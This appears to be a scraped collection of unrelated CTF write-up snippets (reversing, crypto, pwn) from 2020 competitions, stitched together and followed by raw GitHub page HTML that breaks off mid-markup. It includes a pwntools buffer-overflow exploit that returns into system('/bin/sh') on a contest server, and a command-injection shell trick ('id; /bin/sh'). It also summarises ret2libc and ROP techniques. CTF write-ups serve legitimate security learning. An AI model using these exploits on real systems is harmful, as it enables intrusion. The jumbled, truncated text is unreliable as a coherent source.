switch ( opcode ) { case 0xF0u: var1 = input[i] - input_byte; break; case 0xF1u: var1 += var2; break; case 0xF2u: var1 -= var2; break; case 0xF3u: var1 *= var2; break; case 0xF4u: var1 ^= var2; break; case 0xF5u: var2 = var1; break; case 0xF6u: var1 = var2; break; case 0xF7u: v1 = j++; buffer[v1] = var1; break; case 0xF8u: var1 = buffer[--j]; break; case 0xF9u: if ( var1 != var2 ) { puts("The trap is not approving of your trip."); puts("It blocks your passage with its whip."); exit(1); } return; case 0xFAu: var1 = input[i]; break; case 0xFBu: v2 = var2; var2 = var1; var1 = v2; break; case 0xFCu: v0 = k++; byte_602280[v0] = var1; break; case 0xFDu: var1 = byte_602280[--k]; break; default: puts("The trap shorts out and sparks like crazy."); puts("But a spark hits you and you become hazy."); exit(1); return; }}```
Solution:
Since bytecode is small and linear (no conditional jumps). We can easily trace it.
I know that flag length has to be 10, it is easily found by reversing **get_input** function.
I did set bp on every handler, and watched what happens to my input.
First, the program checks:
> **key[0] + key[4] + key[4 + key[4]] == 6**
after that, it checks:
> **key[0] * key[4] * key[4 + key[4]] == 6**
and in the end:
> **key[(4 + key[4] + 0xfb) & 0xff] == 0x1b**
After reversing, I wrote simple keygen :)
```pythonfrom z3 import *
def find_all_possible(s, key): while s.check() == sat: model = s.model() block = [] out = '' for i in range(10): c = key[i] out += chr(model[c].as_long()) block.append(c != model[c]) s.add(Or(block)) print(out)
def main(): s = Solver() key = list()
for i in range(10): key.append(BitVec('b%d' % i, 8)) s.add(key[i] > 32, key[i] < 127) c0 = key[0] - 0x46 c1 = key[1] - 0x46 c4 = key[4] - 0x46 c6 = key[6] - 0x46 s.add(c4 == 2) s.add(c6 + c4 + c0 == 6) s.add(c6 * c4 * c0 == 6) s.add(c1 == 0x1b)
find_all_possible(s, key)
if __name__ == "__main__": sys.exit(main())```
Giving **Ga&SHhIH4Q** to the program yields the flag:
```actf{h0p3_c4nn0t_m3nd_th3_p41n_th4t_y0uv3_c4us3d_m3}```
|
# GTF Poem

This was a pretty simple challenge as you just had to spot every out of place character.
Christma ***x*** in spring? Oh, wait ***-*** it's HTsP Does this bell a ri ***m*** g? Well, come and se ***a*** !
On April ***s*** Fools day Our en ***c*** ineers present you New challenges to pl ***o*** y Hope you'll c ***0*** me th ***l*** ough ***_*** Since you're alrea ***p*** y here You'll find ***o*** hidden secr ***3*** t I ***m*** side the poem where The ta ***z*** k is incomplete
Concatenating those characters resulted in the flag (excluding the culry braces)
### Flag: `X-MAS{co0l_po3mz}` |
wp: [Admpanel](http://taqini.space/2020/04/04/Midnightsun-CTF-2020-pwn-Admpanel-wp/)
file & exp: [github](https://github.com/TaQini/ctf/tree/master/MidnightsunCTF2020/pwn) |
There is a buffer overflow in the log function.```pythonfrom pwn import *
s = remote("admpanel2-01.play.midnightsunctf.se", 31337)
system = 0x000000000401598username_addr = 0x000000000040159B
s.sendline("1")s.sendline("admin")s.sendline("password")s.sendline("1")s.sendline("/bin/sh" + " " * 1024 )s.sendline("2")s.sendline("A" * cyclic_find("raac") + p64(system) + p64(username_addr))s.interactive()``` |
# Reasonably Strong Algorithm### Category: crypto### Description:[RSA](rsa.txt) strikes again!### Author: lamchcl
### Solution:Just another traditional rsa challenge, solved as usual by factorizing n with factordb and reconstructing the private key```pyfrom Crypto.Util.number import inversefrom binascii import unhexlify
n = 126390312099294739294606157407778835887e = 65537c = 13612260682947644362892911986815626931
p = 9336949138571181619q = 13536574980062068373
phi = (p-1)*(q-1)d = inverse(e, phi)
m = pow(c, d, n)
print(unhexlify(hex(m)[2:]))```### Flag:```actf{10minutes}``` |
TLDR: We need to read more EEPROM but it seems to be hardcoded to prevent us from reading more than 197 bytes. However, when malloc runs out of space it returns a null pointer which overlaps with the memory mapped registers. We can craft an object that writes a string here and control all of the registers. This allows us to corrupt the stack pointer to a region of memory we control and use ROP gadgets.
At first, I just leaked the rest of EEPROM which tells us to turn on pin B5. Then, I used different gadgets to write data to DDRB and PORTB which turns on the light and gives us the flag.
[Full writeup](https://ctf.harrisongreen.me/2020/midnightsunctf/avr/) |
This challenge consists of a menu with the option to login as a user and run commands.
As we see here, the login credentials are hardcoded as "admin" and "password"
When we press 2, we get an error message if the command is not "id"
Let's take a look at the code that executes this command and see where any holes may be
The fgets call reads 1024 characters into a size 1024 buffer, so no issue there.......
The hole here is the system() call at line 16. Since this buffer has user-supplied data being executed in a shell, it's a classic command injection vulnerability. So, by doing id; /bin/sh, we can pop a shell and get the flag. Lesson learned, don't blindly run user input :)
 |
It was a ret2libc task , but we had firstly to leak the libc base address using BOF (i leaked it through printf address) than we will return to main and perform our ret2 System :D[Writeup](https://github.com/kahla-sec/CTF-Writeups/tree/master/Midnight%20Sun%20CTF%202020%20Quals/pwn1) |
<html lang="en" data-color-mode="auto" data-light-theme="light" data-dark-theme="dark" data-a11y-animated-images="system"> <head> <meta charset="utf-8"> <link rel="dns-prefetch" href="https://github.githubassets.com"> <link rel="dns-prefetch" href="https://avatars.githubusercontent.com"> <link rel="dns-prefetch" href="https://github-cloud.s3.amazonaws.com"> <link rel="dns-prefetch" href="https://user-images.githubusercontent.com/"> <link rel="preconnect" href="https://github.githubassets.com" crossorigin> <link rel="preconnect" href="https://avatars.githubusercontent.com">
<link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/light-fe3f886b577a.css" /><link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/dark-a1dbeda2886c.css" /><link data-color-theme="dark_dimmed" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_dimmed-1ad5cf51dfeb.css" /><link data-color-theme="dark_high_contrast" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_high_contrast-11d3505dc06a.css" /><link data-color-theme="dark_colorblind" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_colorblind-8b800495504f.css" /><link data-color-theme="light_colorblind" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_colorblind-daa38c88b795.css" /><link data-color-theme="light_high_contrast" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_high_contrast-1b9ea565820a.css" /><link data-color-theme="light_tritanopia" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_tritanopia-e4be9332dd6c.css" /><link data-color-theme="dark_tritanopia" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_tritanopia-0dcf95848dd5.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/primer-c581c4e461bb.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/global-0e278d45156f.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/github-dcaf0f44dbb1.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/code-26709f54a08d.css" />
<script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/wp-runtime-774bfe5ae983.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_stacktrace-parser_dist_stack-trace-parser_esm_js-node_modules_github_bro-327bbf-0aaeb22dd2a5.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/ui_packages_soft-nav_soft-nav_ts-21fc7a4a0e8f.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/environment-e059fd03252f.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_selector-observer_dist_index_esm_js-2646a2c533e3.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_modules_github_details-dialog-elemen-63debe-c04540d458d4.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_relative-time-element_dist_index_js-b9368a9cb79e.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_fzy_js_index_js-node_modules_github_markdown-toolbar-element_dist_index_js-e3de700a4c9d.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_auto-complete-element_dist_index_js-node_modules_github_catalyst_-6afc16-e779583c369f.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_file-attachment-element_dist_index_js-node_modules_github_text-ex-3415a8-7ecc10fb88d0.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_filter-input-element_dist_index_js-node_modules_github_remote-inp-79182d-befd2b2f5880.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_primer_view-components_app_components_primer_primer_js-node_modules_gith-6a1af4-df3bc95b06d3.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/github-elements-fc0e0b89822a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/element-registry-1641411db24a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_lit-html_lit-html_js-9d9fe1859ce5.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_manuelpuyol_turbo_dist_turbo_es2017-esm_js-4140d67f0cc2.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_github_alive-client_dist-bf5aa2-424aa982deef.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_dimensions_js-node_modules_github_hotkey_dist_-9fc4f4-d434ddaf3207.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_color-convert_index_js-35b3ae68c408.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_github_session-resume_dist-def857-2a32d97c93c5.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_paste-markdown_dist_index_esm_js-node_modules_github_quote-select-15ddcc-1512e06cfee0.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_updatable-content_ts-430cacb5f7df.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_keyboard-shortcuts-helper_ts-app_assets_modules_github_be-f5afdb-8dd5f026c5b9.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_sticky-scroll-into-view_ts-0af96d15a250.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_include-fragment_ts-app_assets_modules_github_behaviors_r-4077b4-75370d1c1705.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_commenting_edit_ts-app_assets_modules_github_behaviors_ht-83c235-7883159efa9e.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/behaviors-742151da9690.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_modules_github_catalyst_lib_index_js-06ff531-32d7d1e94817.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/notifications-global-f5b58d24780b.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_morphdom_dist_morphdom-esm_js-node_modules_github_template-parts_lib_index_js-58417dae193c.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_virtualized-list_es_index_js-node_modules_github_memoize_dist_esm_index_js-8496b7c4b809.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-70450e-0370b887db62.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_ref-selector_ts-7bdefeb88a1a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/codespaces-d1ede1f1114e.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_filter-input-element_dist_index_js-node_modules_github_mini-throt-a33094-b03defd3289b.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_file-attachment-element_dist_index_js-node_modules_github_mini-th-85225b-226fc85f9b72.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/repositories-8093725f8825.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/topic-suggestions-7a1f0da7430a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/code-menu-89d93a449480.js"></script>
<title>ctf/2020-MidnightSun/pyBonHash at master · ironore15/ctf · GitHub</title>
<meta name="route-pattern" content="/:user_id/:repository/tree/*name(/*path)">
<meta name="current-catalog-service-hash" content="343cff545437bc2b0304c97517abf17bb80d9887520078e9757df416551ef5d6">
<meta name="request-id" content="C66D:0F2B:6B0375E:6E012B5:64122182" data-pjax-transient="true"/><meta name="html-safe-nonce" content="3be23d0648273d788918d902cfd831ed0a2ffad1e27477903e4d7fef27da0498" data-pjax-transient="true"/><meta name="visitor-payload" content="eyJyZWZlcnJlciI6IiIsInJlcXVlc3RfaWQiOiJDNjZEOjBGMkI6NkIwMzc1RTo2RTAxMkI1OjY0MTIyMTgyIiwidmlzaXRvcl9pZCI6IjE0OTQ2OTg1OTI2MzEzOTg3ODYiLCJyZWdpb25fZWRnZSI6ImZyYSIsInJlZ2lvbl9yZW5kZXIiOiJmcmEifQ==" data-pjax-transient="true"/><meta name="visitor-hmac" content="d38e7c1c4fb2a1716c76550bb5ed60f2de7a40fd200f326a9961d1b8456db4a5" data-pjax-transient="true"/>
<meta name="hovercard-subject-tag" content="repository:239170367" data-turbo-transient>
<meta name="github-keyboard-shortcuts" content="repository,source-code,file-tree" data-turbo-transient="true" />
<meta name="selected-link" value="repo_source" data-turbo-transient>
<meta name="google-site-verification" content="c1kuD-K2HIVF635lypcsWPoD4kilo5-jA_wBFyT4uMY"> <meta name="google-site-verification" content="KT5gs8h0wvaagLKAVWq8bbeNwnZZK1r1XQysX3xurLU"> <meta name="google-site-verification" content="ZzhVyEFwb7w3e0-uOTltm8Jsck2F5StVihD0exw2fsA"> <meta name="google-site-verification" content="GXs5KoUUkNCoaAZn7wPN-t01Pywp9M3sEjnt_3_ZWPc"> <meta name="google-site-verification" content="Apib7-x98H0j5cPqHWwSMm6dNU4GmODRoqxLiDzdx9I">
<meta name="octolytics-url" content="https://collector.github.com/github/collect" />
<meta name="analytics-location" content="/<user-name>/<repo-name>/files/disambiguate" data-turbo-transient="true" />
<meta name="user-login" content="">
<meta name="viewport" content="width=device-width"> <meta name="description" content="CTF writeups from ironore15, KAIST GoN. Contribute to ironore15/ctf development by creating an account on GitHub."> <link rel="search" type="application/opensearchdescription+xml" href="/opensearch.xml" title="GitHub"> <link rel="fluid-icon" href="https://github.com/fluidicon.png" title="GitHub"> <meta property="fb:app_id" content="1401488693436528"> <meta name="apple-itunes-app" content="app-id=1477376905" /> <meta name="twitter:image:src" content="https://opengraph.githubassets.com/2c62c2fbecae4e45b1ea72e81ea456f4443ede61dacba7623fedb1b0b0fae3a4/ironore15/ctf" /><meta name="twitter:site" content="@github" /><meta name="twitter:card" content="summary_large_image" /><meta name="twitter:title" content="ctf/2020-MidnightSun/pyBonHash at master · ironore15/ctf" /><meta name="twitter:description" content="CTF writeups from ironore15, KAIST GoN. Contribute to ironore15/ctf development by creating an account on GitHub." /> <meta property="og:image" content="https://opengraph.githubassets.com/2c62c2fbecae4e45b1ea72e81ea456f4443ede61dacba7623fedb1b0b0fae3a4/ironore15/ctf" /><meta property="og:image:alt" content="CTF writeups from ironore15, KAIST GoN. Contribute to ironore15/ctf development by creating an account on GitHub." /><meta property="og:image:width" content="1200" /><meta property="og:image:height" content="600" /><meta property="og:site_name" content="GitHub" /><meta property="og:type" content="object" /><meta property="og:title" content="ctf/2020-MidnightSun/pyBonHash at master · ironore15/ctf" /><meta property="og:url" content="https://github.com/ironore15/ctf" /><meta property="og:description" content="CTF writeups from ironore15, KAIST GoN. Contribute to ironore15/ctf development by creating an account on GitHub." /> <link rel="assets" href="https://github.githubassets.com/">
<meta name="hostname" content="github.com">
<meta name="expected-hostname" content="github.com">
<meta name="enabled-features" content="TURBO_EXPERIMENT_RISKY,IMAGE_METRIC_TRACKING,GEOJSON_AZURE_MAPS">
<meta http-equiv="x-pjax-version" content="ef97471de14f8d2285f0269e8f0f7dc70845f693d3f6ccd2dd2daae5cd1bbebe" data-turbo-track="reload"> <meta http-equiv="x-pjax-csp-version" content="2a84822a832da97f1ea76cf989a357ec70c85713a2fd8f14c8421b76bbffe38c" data-turbo-track="reload"> <meta http-equiv="x-pjax-css-version" content="adfc12179419e463f9f320d07920b1684c9b7e060d4d9cd3a6cd5d0de37ce710" data-turbo-track="reload"> <meta http-equiv="x-pjax-js-version" content="711646ae23abb27cf728346f30f81c042d4428233a0795acf0e21ed664fe9d94" data-turbo-track="reload">
<meta name="turbo-cache-control" content="no-preview" data-turbo-transient="">
<meta data-hydrostats="publish">
<meta name="go-import" content="github.com/ironore15/ctf git https://github.com/ironore15/ctf.git">
<meta name="octolytics-dimension-user_id" content="37268740" /><meta name="octolytics-dimension-user_login" content="ironore15" /><meta name="octolytics-dimension-repository_id" content="239170367" /><meta name="octolytics-dimension-repository_nwo" content="ironore15/ctf" /><meta name="octolytics-dimension-repository_public" content="true" /><meta name="octolytics-dimension-repository_is_fork" content="false" /><meta name="octolytics-dimension-repository_network_root_id" content="239170367" /><meta name="octolytics-dimension-repository_network_root_nwo" content="ironore15/ctf" />
<link rel="canonical" href="https://github.com/ironore15/ctf/tree/master/2020-MidnightSun/pyBonHash" data-turbo-transient> <meta name="turbo-body-classes" content="logged-out env-production page-responsive">
<meta name="browser-stats-url" content="https://api.github.com/_private/browser/stats">
<meta name="browser-errors-url" content="https://api.github.com/_private/browser/errors">
<meta name="browser-optimizely-client-errors-url" content="https://api.github.com/_private/browser/optimizely_client/errors">
<link rel="mask-icon" href="https://github.githubassets.com/pinned-octocat.svg" color="#000000"> <link rel="alternate icon" class="js-site-favicon" type="image/png" href="https://github.githubassets.com/favicons/favicon.png"> <link rel="icon" class="js-site-favicon" type="image/svg+xml" href="https://github.githubassets.com/favicons/favicon.svg">
<meta name="theme-color" content="#1e2327"><meta name="color-scheme" content="light dark" />
<link rel="manifest" href="/manifest.json" crossOrigin="use-credentials">
</head>
<body class="logged-out env-production page-responsive" style="word-wrap: break-word;"> <div data-turbo-body class="logged-out env-production page-responsive" style="word-wrap: break-word;">
<div class="position-relative js-header-wrapper "> Skip to content <span> <span></span></span>
<script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-94fd67-04fa93bb158a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/sessions-9920eaa99f50.js"></script><header class="Header-old header-logged-out js-details-container Details position-relative f4 py-3" role="banner"> <button type="button" class="Header-backdrop d-lg-none border-0 position-fixed top-0 left-0 width-full height-full js-details-target" aria-label="Toggle navigation"> <span>Toggle navigation</span> </button>
<div class="container-xl d-flex flex-column flex-lg-row flex-items-center p-responsive height-full position-relative z-1"> <div class="d-flex flex-justify-between flex-items-center width-full width-lg-auto"> <svg height="32" aria-hidden="true" viewBox="0 0 16 16" version="1.1" width="32" data-view-component="true" class="octicon octicon-mark-github"> <path d="M8 0c4.42 0 8 3.58 8 8a8.013 8.013 0 0 1-5.45 7.59c-.4.08-.55-.17-.55-.38 0-.27.01-1.13.01-2.2 0-.75-.25-1.23-.54-1.48 1.78-.2 3.65-.88 3.65-3.95 0-.88-.31-1.59-.82-2.15.08-.2.36-1.02-.08-2.12 0 0-.67-.22-2.2.82-.64-.18-1.32-.27-2-.27-.68 0-1.36.09-2 .27-1.53-1.03-2.2-.82-2.2-.82-.44 1.1-.16 1.92-.08 2.12-.51.56-.82 1.28-.82 2.15 0 3.06 1.86 3.75 3.64 3.95-.23.2-.44.55-.51 1.07-.46.21-1.61.55-2.33-.66-.15-.24-.6-.83-1.23-.82-.67.01-.27.38.01.53.34.19.73.9.82 1.13.16.45.68 1.31 2.69.94 0 .67.01 1.3.01 1.49 0 .21-.15.45-.55.38A7.995 7.995 0 0 1 0 8c0-4.42 3.58-8 8-8Z"></path></svg>
<div class="flex-1"> Sign up </div>
<div class="flex-1 flex-order-2 text-right"> <button aria-label="Toggle navigation" aria-expanded="false" type="button" data-view-component="true" class="js-details-target Button--link Button--medium Button d-lg-none color-fg-inherit p-1"> <span> <span><div class="HeaderMenu-toggle-bar rounded my-1"></div> <div class="HeaderMenu-toggle-bar rounded my-1"></div> <div class="HeaderMenu-toggle-bar rounded my-1"></div></span> </span></button> </div> </div>
<div class="HeaderMenu--logged-out p-responsive height-fit position-lg-relative d-lg-flex flex-column flex-auto pt-7 pb-4 top-0"> <div class="header-menu-wrapper d-flex flex-column flex-self-end flex-lg-row flex-justify-between flex-auto p-3 p-lg-0 rounded rounded-lg-0 mt-3 mt-lg-0"> <nav class="mt-0 px-3 px-lg-0 mb-3 mb-lg-0" aria-label="Global"> <button type="button" class="HeaderMenu-link border-0 width-full width-lg-auto px-0 px-lg-2 py-3 py-lg-2 no-wrap d-flex flex-items-center flex-justify-between js-details-target" aria-expanded="false"> Product <svg opacity="0.5" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-chevron-down HeaderMenu-icon ml-1"> <path d="M12.78 5.22a.749.749 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.06 0L3.22 6.28a.749.749 0 1 1 1.06-1.06L8 8.939l3.72-3.719a.749.749 0 0 1 1.06 0Z"></path></svg> </button> <div class="HeaderMenu-dropdown dropdown-menu rounded m-0 p-0 py-2 py-lg-4 position-relative position-lg-absolute left-0 left-lg-n3 d-lg-flex dropdown-menu-wide">
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-workflow color-fg-subtle mr-3"> <path d="M1 3a2 2 0 0 1 2-2h6.5a2 2 0 0 1 2 2v6.5a2 2 0 0 1-2 2H7v4.063C7 16.355 7.644 17 8.438 17H12.5v-2.5a2 2 0 0 1 2-2H21a2 2 0 0 1 2 2V21a2 2 0 0 1-2 2h-6.5a2 2 0 0 1-2-2v-2.5H8.437A2.939 2.939 0 0 1 5.5 15.562V11.5H3a2 2 0 0 1-2-2Zm2-.5a.5.5 0 0 0-.5.5v6.5a.5.5 0 0 0 .5.5h6.5a.5.5 0 0 0 .5-.5V3a.5.5 0 0 0-.5-.5ZM14.5 14a.5.5 0 0 0-.5.5V21a.5.5 0 0 0 .5.5H21a.5.5 0 0 0 .5-.5v-6.5a.5.5 0 0 0-.5-.5Z"></path></svg> <div> <div class="color-fg-default h4">Actions</div> Automate any workflow </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-package color-fg-subtle mr-3"> <path d="M12.876.64V.639l8.25 4.763c.541.313.875.89.875 1.515v9.525a1.75 1.75 0 0 1-.875 1.516l-8.25 4.762a1.748 1.748 0 0 1-1.75 0l-8.25-4.763a1.75 1.75 0 0 1-.875-1.515V6.917c0-.625.334-1.202.875-1.515L11.126.64a1.748 1.748 0 0 1 1.75 0Zm-1 1.298L4.251 6.34l7.75 4.474 7.75-4.474-7.625-4.402a.248.248 0 0 0-.25 0Zm.875 19.123 7.625-4.402a.25.25 0 0 0 .125-.216V7.639l-7.75 4.474ZM3.501 7.64v8.803c0 .09.048.172.125.216l7.625 4.402v-8.947Z"></path></svg> <div> <div class="color-fg-default h4">Packages</div> Host and manage packages </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-shield-check color-fg-subtle mr-3"> <path d="M16.53 9.78a.75.75 0 0 0-1.06-1.06L11 13.19l-1.97-1.97a.75.75 0 0 0-1.06 1.06l2.5 2.5a.75.75 0 0 0 1.06 0l5-5Z"></path><path d="m12.54.637 8.25 2.675A1.75 1.75 0 0 1 22 4.976V10c0 6.19-3.771 10.704-9.401 12.83a1.704 1.704 0 0 1-1.198 0C5.77 20.705 2 16.19 2 10V4.976c0-.758.489-1.43 1.21-1.664L11.46.637a1.748 1.748 0 0 1 1.08 0Zm-.617 1.426-8.25 2.676a.249.249 0 0 0-.173.237V10c0 5.46 3.28 9.483 8.43 11.426a.199.199 0 0 0 .14 0C17.22 19.483 20.5 15.461 20.5 10V4.976a.25.25 0 0 0-.173-.237l-8.25-2.676a.253.253 0 0 0-.154 0Z"></path></svg> <div> <div class="color-fg-default h4">Security</div> Find and fix vulnerabilities </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-codespaces color-fg-subtle mr-3"> <path d="M3.5 3.75C3.5 2.784 4.284 2 5.25 2h13.5c.966 0 1.75.784 1.75 1.75v7.5A1.75 1.75 0 0 1 18.75 13H5.25a1.75 1.75 0 0 1-1.75-1.75Zm-2 12c0-.966.784-1.75 1.75-1.75h17.5c.966 0 1.75.784 1.75 1.75v4a1.75 1.75 0 0 1-1.75 1.75H3.25a1.75 1.75 0 0 1-1.75-1.75ZM5.25 3.5a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h13.5a.25.25 0 0 0 .25-.25v-7.5a.25.25 0 0 0-.25-.25Zm-2 12a.25.25 0 0 0-.25.25v4c0 .138.112.25.25.25h17.5a.25.25 0 0 0 .25-.25v-4a.25.25 0 0 0-.25-.25Z"></path><path d="M10 17.75a.75.75 0 0 1 .75-.75h6.5a.75.75 0 0 1 0 1.5h-6.5a.75.75 0 0 1-.75-.75Zm-4 0a.75.75 0 0 1 .75-.75h.5a.75.75 0 0 1 0 1.5h-.5a.75.75 0 0 1-.75-.75Z"></path></svg> <div> <div class="color-fg-default h4">Codespaces</div> Instant dev environments </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-copilot color-fg-subtle mr-3"> <path d="M9.75 14a.75.75 0 0 1 .75.75v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 .75-.75Zm4.5 0a.75.75 0 0 1 .75.75v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 .75-.75Z"></path><path d="M12 2c2.214 0 4.248.657 5.747 1.756.136.099.268.204.397.312.584.235 1.077.546 1.474.952.85.869 1.132 2.037 1.132 3.368 0 .368-.014.733-.052 1.086l.633 1.478.043.022A4.75 4.75 0 0 1 24 15.222v1.028c0 .529-.309.987-.565 1.293-.28.336-.636.653-.966.918a13.84 13.84 0 0 1-1.299.911l-.024.015-.006.004-.039.025c-.223.135-.45.264-.68.386-.46.245-1.122.571-1.941.895C16.845 21.344 14.561 22 12 22c-2.561 0-4.845-.656-6.479-1.303a19.046 19.046 0 0 1-1.942-.894 14.081 14.081 0 0 1-.535-.3l-.144-.087-.04-.025-.006-.004-.024-.015a13.16 13.16 0 0 1-1.299-.911 6.913 6.913 0 0 1-.967-.918C.31 17.237 0 16.779 0 16.25v-1.028a4.75 4.75 0 0 1 2.626-4.248l.043-.022.633-1.478a10.195 10.195 0 0 1-.052-1.086c0-1.331.282-2.498 1.132-3.368.397-.406.89-.717 1.474-.952.129-.108.261-.213.397-.312C7.752 2.657 9.786 2 12 2Zm-8 9.654v6.669a17.59 17.59 0 0 0 2.073.98C7.595 19.906 9.686 20.5 12 20.5c2.314 0 4.405-.594 5.927-1.197a17.59 17.59 0 0 0 2.073-.98v-6.669l-.038-.09c-.046.061-.095.12-.145.177-.793.9-2.057 1.259-3.782 1.259-1.59 0-2.738-.544-3.508-1.492a4.323 4.323 0 0 1-.355-.508h-.344a4.323 4.323 0 0 1-.355.508C10.704 12.456 9.555 13 7.965 13c-1.725 0-2.989-.359-3.782-1.259a3.026 3.026 0 0 1-.145-.177Zm6.309-1.092c.445-.547.708-1.334.851-2.301.057-.357.087-.718.09-1.079v-.031c-.001-.762-.166-1.26-.43-1.568l-.008-.01c-.341-.391-1.046-.689-2.533-.529-1.505.163-2.347.537-2.824 1.024-.462.473-.705 1.18-.705 2.32 0 .605.044 1.087.135 1.472.092.384.231.672.423.89.365.413 1.084.75 2.657.75.91 0 1.527-.223 1.964-.564.14-.11.268-.235.38-.374Zm2.504-2.497c.136 1.057.403 1.913.878 2.497.442.545 1.134.938 2.344.938 1.573 0 2.292-.337 2.657-.751.384-.435.558-1.151.558-2.361 